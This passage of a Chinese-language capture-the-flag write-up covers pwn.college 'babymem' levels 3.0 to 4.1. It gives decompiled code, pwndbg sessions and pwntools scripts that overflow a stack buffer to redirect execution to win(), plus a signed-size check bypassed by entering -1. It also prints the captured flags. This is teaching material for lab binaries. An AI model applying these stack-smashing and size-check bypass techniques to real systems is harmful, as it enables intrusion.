| 0x00007ffd41f775c0 (rsp+0x0040) | 00 00 00 00 00 00 00 00 | 0x0000000000000000 |
| 0x00007ffd41f775c8 (rsp+0x0048) | 00 00 00 00 00 00 00 00 | 0x0000000000000000 |
| 0x00007ffd41f775d0 (rsp+0x0050) | 00 00 00 00 00 00 00 00 | 0x0000000000000000 |
| 0x00007ffd41f775d8 (rsp+0x0058) | 00 00 00 00 00 00 00 00 | 0x0000000000000000 |
| 0x00007ffd41f775e0 (rsp+0x0060) | 00 00 00 00 00 00 00 00 | 0x0000000000000000 |
| 0x00007ffd41f775e8 (rsp+0x0068) | 00 00 00 00 00 00 00 00 | 0x0000000000000000 |
| 0x00007ffd41f775f0 (rsp+0x0070) | 00 00 00 00 00 00 00 00 | 0x0000000000000000 |
| 0x00007ffd41f775f8 (rsp+0x0078) | b0 75 f7 41 fd 7f 00 00 | 0x00007ffd41f775b0 |
| 0x00007ffd41f77600 (rsp+0x0080) | 30 86 f7 41 fd 7f 00 00 | 0x00007ffd41f78630 |
| 0x00007ffd41f77608 (rsp+0x0088) | 51 2a 40 00 00 00 00 00 | 0x0000000000402a51 |
+---------------------------------+-------------------------+--------------------+
Our stack pointer points to 0x7ffd41f77580, and our base pointer points to 0x7ffd41f77600.
This means that we have (decimal) 18 8-byte words in our stack frame,
including the saved base pointer and the saved return address, for a
total of 144 bytes.
The input buffer begins at 0x7ffd41f775b0, partway through the stack frame,
("above" it in the stack are other local variables used by the function).
Your input will be read into this buffer.
The buffer is 68 bytes long, but the program will let you provide an arbitrarily
large input length, and thus overflow the buffer.

In this level, there is no "win" variable.
You will need to force the program to execute the win() function
by directly overflowing into the stored return address back to main,
which is stored at 0x7ffd41f77608, 88 bytes after the start of your input buffer.
That means that you will need to input at least 96 bytes (68 to fill the buffer,
20 to fill other stuff stored between the buffer and the return address,
and 8 that will overwrite the return address).

We have disabled the following standard memory corruption mitigations for this challenge:
- the canary is disabled, otherwise you would corrupt it before
overwriting the return address, and the program would abort.
- the binary is *not* position independent. This means that it will be
located at the same spot every time it is run, which means that by
analyzing the binary (using objdump or reading this output), you can
know the exact value that you need to overwrite the return address with.

Payload size:

程序直接告诉我们目的和需要多大的 padding 了，所以接下来直接找 win 的地址就好了。

直接上 pwndbg 查 win 函数地址：

pwndbg> i fun
All defined functions:

Non-debugging symbols:
0x0000000000401000  _init
0x00000000004010f0  putchar@plt
0x0000000000401100  __errno_location@plt
0x0000000000401110  puts@plt
0x0000000000401120  write@plt
0x0000000000401130  printf@plt
0x0000000000401140  geteuid@plt
0x0000000000401150  read@plt
0x0000000000401160  setvbuf@plt
0x0000000000401170  open@plt
0x0000000000401180  __isoc99_scanf@plt
0x0000000000401190  exit@plt
0x00000000004011a0  strerror@plt
0x00000000004011b0  _start
0x00000000004011e0  _dl_relocate_static_pie
0x00000000004011f0  deregister_tm_clones
0x0000000000401220  register_tm_clones
0x0000000000401260  __do_global_dtors_aux
0x0000000000401290  frame_dummy
0x0000000000401296  DUMP_STACK
0x0000000000401499  bin_padding
0x0000000000402331  win
0x0000000000402438  challenge
0x000000000040298b  main
0x0000000000402a70  __libc_csu_init
0x0000000000402ae0  __libc_csu_fini
0x0000000000402ae8  _fini

Exploit

#!/usr/bin/python3

from pwn import context, ELF, process, remote, gdb, p64

context(log_level="debug", terminal="kitty")

FILE = "./babymem-level-3-0"
HOST = "pwn.college"
PORT = 1337

gdbscript = """
c
"""


def launch(local=True, debug=False):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug([elf.path], gdbscript=gdbscript)
        else:
            return process([elf.path])
    else:
        return remote(HOST, PORT)


target = launch()

payload = b"".ljust(88, b"A") + p64(0x402331)
payload_size = str(len(payload)).encode()

target.recvuntil(b"Payload size: ")
target.sendline(payload_size)
target.recvuntil(b"Send your payload")
target.send(payload)

target.recvall()

Flag

Flag: pwn.college{0omKd6AgzV5NaakXpbDyYSre3hD.01M5IDL5cTNxgzW}

Level 3.1

Information

Category: Pwn

Description

Overflow a buffer and smash the stack to obtain the flag!

Write-up

__int64 challenge()
{
  int *v0; // rax
  char *v1; // rax
  size_t nbytes; // [rsp+28h] [rbp-88h] BYREF
  _QWORD v4[13]; // [rsp+30h] [rbp-80h] BYREF
  int v5; // [rsp+98h] [rbp-18h]
  __int16 v6; // [rsp+9Ch] [rbp-14h]
  int v7; // [rsp+A4h] [rbp-Ch]
  void *buf; // [rsp+A8h] [rbp-8h]

  memset(v4, 0, sizeof(v4));
  v5 = 0;
  v6 = 0;
  buf = v4;
  nbytes = 0LL;
  printf("Payload size: ");
  __isoc99_scanf("%lu", &nbytes);
  printf("Send your payload (up to %lu bytes)!\n", nbytes);
  v7 = read(0, buf, nbytes);
  if ( v7 < 0 )
  {
    v0 = __errno_location();
    v1 = strerror(*v0);
    printf("ERROR: Failed to read input -- %s!\n", v1);
    exit(1);
  }
  puts("Goodbye!");
  return 0LL;
}

pwndbg> i fun
All defined functions:

Non-debugging symbols:
0x0000000000401000  _init
0x00000000004010f0  putchar@plt
0x0000000000401100  __errno_location@plt
0x0000000000401110  puts@plt
0x0000000000401120  write@plt
0x0000000000401130  printf@plt
0x0000000000401140  geteuid@plt
0x0000000000401150  read@plt
0x0000000000401160  setvbuf@plt
0x0000000000401170  open@plt
0x0000000000401180  __isoc99_scanf@plt
0x0000000000401190  exit@plt
0x00000000004011a0  strerror@plt
0x00000000004011b0  _start
0x00000000004011e0  _dl_relocate_static_pie
0x00000000004011f0  deregister_tm_clones
0x0000000000401220  register_tm_clones
0x0000000000401260  __do_global_dtors_aux
0x0000000000401290  frame_dummy
0x0000000000401296  bin_padding
0x0000000000401a0b  win
0x0000000000401b12  challenge
0x0000000000401c64  main
0x0000000000401d40  __libc_csu_init
0x0000000000401db0  __libc_csu_fini
0x0000000000401db8  _fini
pwndbg> disass challenge
Dump of assembler code for function challenge:
   0x0000000000401b12 <+0>: endbr64
   0x0000000000401b16 <+4>: push   rbp
   0x0000000000401b17 <+5>: mov    rbp,rsp
   0x0000000000401b1a <+8>: sub    rsp,0xb0
   0x0000000000401b21 <+15>: mov    DWORD PTR [rbp-0x94],edi
   0x0000000000401b27 <+21>: mov    QWORD PTR [rbp-0xa0],rsi
   0x0000000000401b2e <+28>: mov    QWORD PTR [rbp-0xa8],rdx
   0x0000000000401b35 <+35>: mov    QWORD PTR [rbp-0x80],0x0
   0x0000000000401b3d <+43>: mov    QWORD PTR [rbp-0x78],0x0
   0x0000000000401b45 <+51>: mov    QWORD PTR [rbp-0x70],0x0
   0x0000000000401b4d <+59>: mov    QWORD PTR [rbp-0x68],0x0
   0x0000000000401b55 <+67>: mov    QWORD PTR [rbp-0x60],0x0
   0x0000000000401b5d <+75>: mov    QWORD PTR [rbp-0x58],0x0
   0x0000000000401b65 <+83>: mov    QWORD PTR [rbp-0x50],0x0
   0x0000000000401b6d <+91>: mov    QWORD PTR [rbp-0x48],0x0
   0x0000000000401b75 <+99>: mov    QWORD PTR [rbp-0x40],0x0
   0x0000000000401b7d <+107>: mov    QWORD PTR [rbp-0x38],0x0
   0x0000000000401b85 <+115>: mov    QWORD PTR [rbp-0x30],0x0
   0x0000000000401b8d <+123>: mov    QWORD PTR [rbp-0x28],0x0
   0x0000000000401b95 <+131>: mov    QWORD PTR [rbp-0x20],0x0
   0x0000000000401b9d <+139>: mov    DWORD PTR [rbp-0x18],0x0
   0x0000000000401ba4 <+146>: mov    WORD PTR [rbp-0x14],0x0
   0x0000000000401baa <+152>: lea    rax,[rbp-0x80]
   0x0000000000401bae <+156>: mov    QWORD PTR [rbp-0x8],rax
   0x0000000000401bb2 <+160>: mov    QWORD PTR [rbp-0x88],0x0
   0x0000000000401bbd <+171>: lea    rdi,[rip+0x548]        # 0x40210c
   0x0000000000401bc4 <+178>: mov    eax,0x0
   0x0000000000401bc9 <+183>: call   0x401130 <printf@plt>
   0x0000000000401bce <+188>: lea    rax,[rbp-0x88]
   0x0000000000401bd5 <+195>: mov    rsi,rax
   0x0000000000401bd8 <+198>: lea    rdi,[rip+0x53c]        # 0x40211b
   0x0000000000401bdf <+205>: mov    eax,0x0
   0x0000000000401be4 <+210>: call   0x401180 <__isoc99_scanf@plt>
   0x0000000000401be9 <+215>: mov    rax,QWORD PTR [rbp-0x88]
   0x0000000000401bf0 <+222>: mov    rsi,rax
   0x0000000000401bf3 <+225>: lea    rdi,[rip+0x526]        # 0x402120
   0x0000000000401bfa <+232>: mov    eax,0x0
   0x0000000000401bff <+237>: call   0x401130 <printf@plt>
   0x0000000000401c04 <+242>: mov    rdx,QWORD PTR [rbp-0x88]
   0x0000000000401c0b <+249>: mov    rax,QWORD PTR [rbp-0x8]
   0x0000000000401c0f <+253>: mov    rsi,rax
   0x0000000000401c12 <+256>: mov    edi,0x0
   0x0000000000401c17 <+261>: call   0x401150 <read@plt>
   0x0000000000401c1c <+266>: mov    DWORD PTR [rbp-0xc],eax
   0x0000000000401c1f <+269>: cmp    DWORD PTR [rbp-0xc],0x0
   0x0000000000401c23 <+273>: jns    0x401c51 <challenge+319>
   0x0000000000401c25 <+275>: call   0x401100 <__errno_location@plt>
   0x0000000000401c2a <+280>: mov    eax,DWORD PTR [rax]
   0x0000000000401c2c <+282>: mov    edi,eax
   0x0000000000401c2e <+284>: call   0x4011a0 <strerror@plt>
   0x0000000000401c33 <+289>: mov    rsi,rax
   0x0000000000401c36 <+292>: lea    rdi,[rip+0x50b]        # 0x402148
   0x0000000000401c3d <+299>: mov    eax,0x0
   0x0000000000401c42 <+304>: call   0x401130 <printf@plt>
   0x0000000000401c47 <+309>: mov    edi,0x1
   0x0000000000401c4c <+314>: call   0x401190 <exit@plt>
   0x0000000000401c51 <+319>: lea    rdi,[rip+0x514]        # 0x40216c
   0x0000000000401c58 <+326>: call   0x401110 <puts@plt>
   0x0000000000401c5d <+331>: mov    eax,0x0
   0x0000000000401c62 <+336>: leave
   0x0000000000401c63 <+337>: ret
End of assembler dump.
pwndbg> b *challenge+261
Breakpoint 1 at 0x401c17
pwndbg> r
Starting program: /home/cub3y0nd/Projects/pwn.college/babymem-level-3-1
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
###
### Welcome to /home/cub3y0nd/Projects/pwn.college/babymem-level-3-1!
###

Payload size: 1771
Send your payload (up to 1771 bytes)!

Breakpoint 1, 0x0000000000401c17 in challenge ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────
 RAX  0x7fffffffd130 ◂— 0
 RBX  0x7fffffffe308 —▸ 0x7fffffffe6bb ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-3-1'
 RCX  0
 RDX  0x6eb
 RDI  0
 RSI  0x7fffffffd130 ◂— 0
 R8   0x75
 R9   0xfffffffc
 R10  0
 R11  0x202
 R12  1
 R13  0
 R14  0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 ◂— 0
 R15  0
 RBP  0x7fffffffd1b0 —▸ 0x7fffffffe1e0 —▸ 0x7fffffffe280 —▸ 0x7fffffffe2e0 ◂— 0
 RSP  0x7fffffffd100 ◂— 0xa /* '\n' */
 RIP  0x401c17 (challenge+261) ◂— call 0x401150
────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────
 ► 0x401c17 <challenge+261>    call   read@plt                    <read@plt>
        fd: 0 (/dev/pts/2)
        buf: 0x7fffffffd130 ◂— 0
        nbytes: 0x6eb

   0x401c1c <challenge+266>    mov    dword ptr [rbp - 0xc], eax
   0x401c1f <challenge+269>    cmp    dword ptr [rbp - 0xc], 0
   0x401c23 <challenge+273>    jns    challenge+319               <challenge+319>

   0x401c25 <challenge+275>    call   __errno_location@plt        <__errno_location@plt>

   0x401c2a <challenge+280>    mov    eax, dword ptr [rax]
   0x401c2c <challenge+282>    mov    edi, eax
   0x401c2e <challenge+284>    call   strerror@plt                <strerror@plt>

   0x401c33 <challenge+289>    mov    rsi, rax
   0x401c36 <challenge+292>    lea    rdi, [rip + 0x50b]     RDI => 0x402148 ◂— 'ERROR: Failed to read input -- %s!\n'
   0x401c3d <challenge+299>    mov    eax, 0                 EAX => 0
─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp     0x7fffffffd100 ◂— 0xa /* '\n' */
01:0008│-0a8     0x7fffffffd108 —▸ 0x7fffffffe318 —▸ 0x7fffffffe6f1 ◂— 'SHELL=/usr/bin/zsh'
02:0010│-0a0     0x7fffffffd110 —▸ 0x7fffffffe308 —▸ 0x7fffffffe6bb ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-3-1'
03:0018│-098     0x7fffffffd118 ◂— 0x100000000
04:0020│-090     0x7fffffffd120 —▸ 0x7fffffffd140 ◂— 0
05:0028│-088     0x7fffffffd128 ◂— 0x6eb
06:0030│ rax rsi 0x7fffffffd130 ◂— 0
07:0038│-078     0x7fffffffd138 ◂— 0
───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────
 ► 0         0x401c17 challenge+261
   1         0x401d2a main+198
   2   0x7ffff7dcae08
   3   0x7ffff7dcaecc __libc_start_main+140
   4         0x4011de _start+46
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> i frame
Stack level 0, frame at 0x7fffffffd1c0:
 rip = 0x401c17 in challenge; saved rip = 0x401d2a
 called by frame at 0x7fffffffe1f0
 Arglist at 0x7fffffffd1b0, args:
 Locals at 0x7fffffffd1b0, Previous frame's sp is 0x7fffffffd1c0
 Saved registers:
  rbp at 0x7fffffffd1b0, rip at 0x7fffffffd1b8
pwndbg> distance 0x7fffffffd130 0x7fffffffd1b8
0x7fffffffd130->0x7fffffffd1b8 is 0x88 bytes (0x11 words)

很显然这是想让我们覆盖返回地址控制程序执行流程，达到执行 win 的目的。

Exploit

#!/usr/bin/python3

from pwn import context, ELF, process, remote, gdb, p64

context(log_level="debug", terminal="kitty")

FILE = "./babymem-level-3-1"
HOST = "pwn.college"
PORT = 1337

gdbscript = """
c
"""


def launch(local=True, debug=False):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug([elf.path], gdbscript=gdbscript)
        else:
            return process([elf.path])
    else:
        return remote(HOST, PORT)


target = launch()

payload = b"".ljust(0x88, b"A") + p64(0x401A0B)
payload_size = str(len(payload)).encode()

target.recvuntil(b"Payload size: ")
target.sendline(payload_size)
target.recvuntil(b"Send your payload")
target.send(payload)

target.recvall()

Flag

Flag: pwn.college{k2xNTDjO8L-Rt_oy5sU-i2dFj1y.0FN5IDL5cTNxgzW}

Level 4.0

Information

Category: Pwn

Description

Overflow a buffer and smash the stack to obtain the flag, but this time bypass a check designed to prevent you from doing so!

Write-up

__int64 __fastcall challenge(int a1, __int64 a2, __int64 a3)
{
  int *v3; // rax
  char *v4; // rax
  _QWORD v6[3]; // [rsp+0h] [rbp-B0h] BYREF
  int v7; // [rsp+1Ch] [rbp-94h]
  size_t nbytes[15]; // [rsp+2Ch] [rbp-84h] BYREF
  int v9; // [rsp+A4h] [rbp-Ch]
  void *buf; // [rsp+A8h] [rbp-8h]
  __int64 savedregs; // [rsp+B0h] [rbp+0h] BYREF
  _UNKNOWN *retaddr; // [rsp+B8h] [rbp+8h] BYREF

  v7 = a1;
  v6[2] = a2;
  v6[1] = a3;
  buf = (char *)nbytes + 4;
  memset(nbytes, 0, 110);
  puts("The challenge() function has just been launched!");
  sp_ = (__int64)v6;
  bp_ = (__int64)&savedregs;
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v6) >> 3) + 2;
  rp_ = (__int64)&retaddr;
  puts("Before we do anything, let's take a look at challenge()'s stack frame:");
  DUMP_STACK(sp_, sz_);
  printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_);
  printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_);
  puts("including the saved base pointer and the saved return address, for a");
  printf("total of %d bytes.\n", 8 * sz_);
  printf("The input buffer begins at %p, partway through the stack frame,\n", buf);
  puts("(\"above\" it in the stack are other local variables used by the function).");
  puts("Your input will be read into this buffer.");
  printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 106);
  puts("large input length, and thus overflow the buffer.\n");
  puts("In this level, there is no \"win\" variable.");
  puts("You will need to force the program to execute the win() function");
  puts("by directly overflowing into the stored return address back to main,");
  printf(
    "which is stored at %p, %d bytes after the start of your input buffer.\n",
    (const void *)rp_,
    rp_ - (_DWORD)buf);
  printf(
    "That means that you will need to input at least %d bytes (%d to fill the buffer,\n",
    rp_ - (_DWORD)buf + 8,
    106);
  printf("%d to fill other stuff stored between the buffer and the return address,\n", rp_ - (_DWORD)buf - 106);
  puts("and 8 that will overwrite the return address).\n");
  puts("We have disabled the following standard memory corruption mitigations for this challenge:");
  puts("- the canary is disabled, otherwise you would corrupt it before");
  puts("overwriting the return address, and the program would abort.");
  puts("- the binary is *not* position independent. This means that it will be");
  puts("located at the same spot every time it is run, which means that by");
  puts("analyzing the binary (using objdump or reading this output), you can");
  puts("know the exact value that you need to overwrite the return address with.\n");
  printf("Payload size: ");
  __isoc99_scanf("%i", nbytes);
  puts("This challenge is more careful: it will check to make sure you");
  puts("don't want to provide so much data that the input buffer will");
  puts("overflow. But recall twos compliment, look at how the check is");
  puts("implemented, and try to beat it!");
  if ( SLODWORD(nbytes[0]) > 106 )
  {
    puts("Provided size is too large!");
    exit(1);
  }
  puts("You made it past the check! Because the read() call will interpret");
  puts("your size differently than the check above, the resulting read will");
  puts("be unstable and might fail. You will likely have to try this several");
  puts("times before your input is actually read.");
  printf("You have chosen to send %i bytes of input!\n", LODWORD(nbytes[0]));
  printf("This will allow you to write from %p (the start of the input buffer)\n", buf);
  printf(
    "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n",
    (char *)buf + SLODWORD(nbytes[0]),
    LODWORD(nbytes[0]) - 106);
  printf("Of these, you will overwrite %d bytes into the return address.\n", (_DWORD)buf + LODWORD(nbytes[0]) - rp_);
  puts("If that number is greater than 8, you will overwrite the entire return address.\n");
  puts("You will want to overwrite the return value from challenge()");
  printf("(located at %p, %d bytes past the start of the input buffer)\n", (const void *)rp_, rp_ - (_DWORD)buf);
  printf("with %p, which is the address of the win() function.\n", win);
  puts("This will cause challenge() to return directly into the win() function,");
  puts("which will in turn give you the flag.");
  puts("Keep in mind that you will need to write the address of the win() function");
  puts("in little-endian (bytes backwards) so that it is interpreted properly.\n");
  printf("Send your payload (up to %i bytes)!\n", LODWORD(nbytes[0]));
  v9 = read(0, buf, LODWORD(nbytes[0]));
  if ( v9 < 0 )
  {
    v3 = __errno_location();
    v4 = strerror(*v3);
    printf("ERROR: Failed to read input -- %s!\n", v4);
    exit(1);
  }
  printf("You sent %d bytes!\n", v9);
  puts("Let's see what happened with the stack:\n");
  DUMP_STACK(sp_, sz_);
  puts("The program's memory status:");
  printf("- the input buffer starts at %p\n", buf);
  printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_);
  printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_);
  printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_);
  printf("- the address of win() is %p.\n", win);
  putchar(10);
  puts("If you have managed to overwrite the return address with the correct value,");
  puts("challenge() will jump straight to win() when it returns.");
  printf("Let's try it now!\n\n");
  puts("Goodbye!");
  return 0LL;
}

// ...

if ( SLODWORD(nbytes[0]) > 106 )
{
  puts("Provided size is too large!");
  exit(1);
}

SLODWORD(nbytes[0]) > 106 则退出程序。但是我们的 payload 为 144 bytes（提示信息中已经说明了 payload 长度），因此显然不能在 payload size 中直接输入 144。

为了绕过这一点，我们注意到 nbytes 的类型为 size_t：

// ...

size_t nbytes[15]; // [rsp+2Ch] [rbp-84h] BYREF

因为 size_t 是无符号整形，所以如果我们提供一个负数，它将会被隐式地转换为无符号数。

根据补码规则我们知道，-1 会被表示成 0xffffffff，如果把它看作无符号数，这无疑是相当大的一个数字。

又因为程序使用 SLODWORD 来判断，这是获取一个有符号数的低 DWORD。

那么如果我们输入 -1 ，则程序最后执行 SLODWORD(nbytes[0]) > 106 时判断的会是 0xffffffff 和 106 的大小。很显然前者小于后者，成功绕过了这个 if 判断。

而由于有符号数被隐式转换为无符号数保存在了 nbytes 中，故我们获得了一个相当大的输入范围。

正好 read 获取用户输入的时候也把最大输入大小视作无符号数，毕竟输入大小显然不可能为负数。但这也为我们的攻击带来了可能：

// ...

v9 = read(0, buf, LODWORD(nbytes[0]));

Exploit

#!/usr/bin/python3

from pwn import context, ELF, process, remote, gdb, p64

context(log_level="debug", terminal="kitty")

FILE = "./babymem-level-4-0"
HOST = "pwn.college"
PORT = 1337

gdbscript = """
c
"""


def launch(local=True, debug=False):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug([elf.path], gdbscript=gdbscript)
        else:
            return process([elf.path])
    else:
        return remote(HOST, PORT)


target = launch()

payload = b"".ljust(0x88, b"A") + p64(0x4020F3)

target.recvuntil(b"Payload size: ")
target.sendline(b"-1")
target.recvuntil(b"Send your payload")
target.send(payload)

target.recvall()

Flag

Flag: pwn.college{YWYtWHsecMbA0xSnI1_Yfj-kjlB.0VN5IDL5cTNxgzW}

Level 4.1

Information

Category: Pwn

Description

Overflow a buffer and smash the stack to obtain the flag, but this time bypass a check designed to prevent you from doing so!

Write-up

__int64 challenge()
{
  int *v0; // rax
  char *v1; // rax
  size_t nbytes[7]; // [rsp+2Ch] [rbp-44h] BYREF
  int v4; // [rsp+64h] [rbp-Ch]
  void *buf; // [rsp+68h] [rbp-8h]

  buf = (char *)nbytes + 4;
  memset(nbytes, 0, 50);
  printf("Payload size: ");
  __isoc99_scanf("%i", nbytes);
  if ( SLODWORD(nbytes[0]) > 46 )
  {
    puts("Provided size is too large!");
    exit(1);
  }
  printf("Send your payload (up to %i bytes)!\n", LODWORD(nbytes[0]));
  v4 = read(0, buf, LODWORD(nbytes[0]));
  if ( v4 < 0 )
  {
    v0 = __errno_location();
    v1 = strerror(*v0);
    printf("ERROR: Failed to read input -- %s!\n", v1);
    exit(1);
  }
  puts("Goodbye!");
  return 0LL;
}

和上一题思路相同，都是通过有符号数隐式转换为无符号数绕过 payload 长度判断，然后覆盖返回地址。几乎没区别，这里就不再赘述分析过程了。

pwndbg> i fun
All defined functions:

Non-debugging symbols:
0x0000000000401000  _init
0x00000000004010f0  putchar@plt
0x0000000000401100  __errno_location@plt
0x0000000000401110  puts@plt
0x0000000000401120  write@plt
0x0000000000401130  printf@plt
0x0000000000401140  geteuid@plt
0x0000000000401150  read@plt
0x0000000000401160  setvbuf@plt
0x0000000000401170  open@plt
0x0000000000401180  __isoc99_scanf@plt
0x0000000000401190  exit@plt
0x00000000004011a0  strerror@plt
0x00000000004011b0  _start
0x00000000004011e0  _dl_relocate_static_pie
0x00000000004011f0  deregister_tm_clones
0x0000000000401220  register_tm_clones
0x0000000000401260  __do_global_dtors_aux
0x0000000000401290  frame_dummy
0x0000000000401296  bin_padding
0x0000000000401704  win
0x000000000040180b  challenge
0x0000000000401921  main
0x0000000000401a00  __libc_csu_init
0x0000000000401a70  __libc_csu_fini
0x0000000000401a78  _fini
pwndbg> disass challenge
Dump of assembler code for function challenge:
   0x000000000040180b <+0>: endbr64
   0x000000000040180f <+4>: push   rbp
   0x0000000000401810 <+5>: mov    rbp,rsp
   0x0000000000401813 <+8>: sub    rsp,0x70
   0x0000000000401817 <+12>: mov    DWORD PTR [rbp-0x54],edi
   0x000000000040181a <+15>: mov    QWORD PTR [rbp-0x60],rsi
   0x000000000040181e <+19>: mov    QWORD PTR [rbp-0x68],rdx
   0x0000000000401822 <+23>: mov    QWORD PTR [rbp-0x40],0x0
   0x000000000040182a <+31>: mov    QWORD PTR [rbp-0x38],0x0
   0x0000000000401832 <+39>: mov    QWORD PTR [rbp-0x30],0x0
   0x000000000040183a <+47>: mov    QWORD PTR [rbp-0x28],0x0
   0x0000000000401842 <+55>: mov    QWORD PTR [rbp-0x20],0x0
   0x000000000040184a <+63>: mov    DWORD PTR [rbp-0x18],0x0
   0x0000000000401851 <+70>: mov    WORD PTR [rbp-0x14],0x0
   0x0000000000401857 <+76>: lea    rax,[rbp-0x40]
   0x000000000040185b <+80>: mov    QWORD PTR [rbp-0x8],rax
   0x000000000040185f <+84>: mov    DWORD PTR [rbp-0x44],0x0
   0x0000000000401866 <+91>: lea    rdi,[rip+0x89f]        # 0x40210c
   0x000000000040186d <+98>: mov    eax,0x0
   0x0000000000401872 <+103>: call   0x401130 <printf@plt>
   0x0000000000401877 <+108>: lea    rax,[rbp-0x44]
   0x000000000040187b <+112>: mov    rsi,rax
   0x000000000040187e <+115>: lea    rdi,[rip+0x896]        # 0x40211b
   0x0000000000401885 <+122>: mov    eax,0x0
   0x000000000040188a <+127>: call   0x401180 <__isoc99_scanf@plt>
   0x000000000040188f <+132>: mov    eax,DWORD PTR [rbp-0x44]
   0x0000000000401892 <+135>: cmp    eax,0x2e
   0x0000000000401895 <+138>: jle    0x4018ad <challenge+162>
   0x0000000000401897 <+140>: lea    rdi,[rip+0x880]        # 0x40211e
   0x000000000040189e <+147>: call   0x401110 <puts@plt>
   0x00000000004018a3 <+152>: mov    edi,0x1
   0x00000000004018a8 <+157>: call   0x401190 <exit@plt>
   0x00000000004018ad <+162>: mov    eax,DWORD PTR [rbp-0x44]
   0x00000000004018b0 <+165>: mov    esi,eax
   0x00000000004018b2 <+167>: lea    rdi,[rip+0x887]        # 0x402140
   0x00000000004018b9 <+174>: mov    eax,0x0
   0x00000000004018be <+179>: call   0x401130 <printf@plt>
   0x00000000004018c3 <+184>: mov    eax,DWORD PTR [rbp-0x44]
   0x00000000004018c6 <+187>: mov    edx,eax
   0x00000000004018c8 <+189>: mov    rax,QWORD PTR [rbp-0x8]
   0x00000000004018cc <+193>: mov    rsi,rax
   0x00000000004018cf <+196>: mov    edi,0x0
   0x00000000004018d4 <+201>: call   0x401150 <read@plt>
   0x00000000004018d9 <+206>: mov    DWORD PTR [rbp-0xc],eax
   0x00000000004018dc <+209>: cmp    DWORD PTR [rbp-0xc],0x0
   0x00000000004018e0 <+213>: jns    0x40190e <challenge+259>
   0x00000000004018e2 <+215>: call   0x401100 <__errno_location@plt>
   0x00000000004018e7 <+220>: mov    eax,DWORD PTR [rax]
   0x00000000004018e9 <+222>: mov    edi,eax
   0x00000000004018eb <+224>: call   0x4011a0 <strerror@plt>
   0x00000000004018f0 <+229>: mov    rsi,rax
   0x00000000004018f3 <+232>: lea    rdi,[rip+0x86e]        # 0x402168
   0x00000000004018fa <+239>: mov    eax,0x0
   0x00000000004018ff <+244>: call   0x401130 <printf@plt>
   0x0000000000401904 <+249>: mov    edi,0x1
   0x0000000000401909 <+254>: call   0x401190 <exit@plt>
   0x000000000040190e <+259>: lea    rdi,[rip+0x877]        # 0x40218c
   0x0000000000401915 <+266>: call   0x401110 <puts@plt>
   0x000000000040191a <+271>: mov    eax,0x0
   0x000000000040191f <+276>: leave
   0x0000000000401920 <+277>: ret
End of assembler dump.
pwndbg> b *challenge+201
Breakpoint 1 at 0x4018d4
pwndbg> r
Starting program: /home/cub3y0nd/Projects/pwn.college/babymem-level-4-1
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
###
### Welcome to /home/cub3y0nd/Projects/pwn.college/babymem-level-4-1!
###

Payload size: 16
Send your payload (up to 16 bytes)!

Breakpoint 1, 0x00000000004018d4 in challenge ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────[ REGISTERS / show-flags off / show-compact-regs off ]────────────────
 RAX  0x7fffffffd170 ◂— 0
 RBX  0x7fffffffe308 —▸ 0x7fffffffe6bb ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-4-1'
 RCX  0
 RDX  0x10
 RDI  0
 RSI  0x7fffffffd170 ◂— 0
 R8   0x69
 R9   0xfffffffe
 R10  0
 R11  0x202
 R12  1
 R13  0
 R14  0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 ◂— 0
 R15  0
 RBP  0x7fffffffd1b0 —▸ 0x7fffffffe1e0 —▸ 0x7fffffffe280 —▸ 0x7fffffffe2e0 ◂— 0
 RSP  0x7fffffffd140 —▸ 0x7fffffffd170 ◂— 0
 RIP  0x4018d4 (challenge+201) ◂— call 0x401150
────────────────────────[ DISASM / x86-64 / set emulate on ]─────────────────────────
 ► 0x4018d4 <challenge+201>    call   read@plt                    <read@plt>
        fd: 0 (/dev/pts/2)
        buf: 0x7fffffffd170 ◂— 0
        nbytes: 0x10

   0x4018d9 <challenge+206>    mov    dword ptr [rbp - 0xc], eax
   0x4018dc <challenge+209>    cmp    dword ptr [rbp - 0xc], 0
   0x4018e0 <challenge+213>    jns    challenge+259               <challenge+259>

   0x4018e2 <challenge+215>    call   __errno_location@plt        <__errno_location@plt>

   0x4018e7 <challenge+220>    mov    eax, dword ptr [rax]
   0x4018e9 <challenge+222>    mov    edi, eax
   0x4018eb <challenge+224>    call   strerror@plt                <strerror@plt>

   0x4018f0 <challenge+229>    mov    rsi, rax
   0x4018f3 <challenge+232>    lea    rdi, [rip + 0x86e]     RDI => 0x402168 ◂— 'ERROR: Failed to read input -- %s!\n'
   0x4018fa <challenge+239>    mov    eax, 0                 EAX => 0
──────────────────────────────────────[ STACK ]──────────────────────────────────────
00:0000│ rsp     0x7fffffffd140 —▸ 0x7fffffffd170 ◂— 0
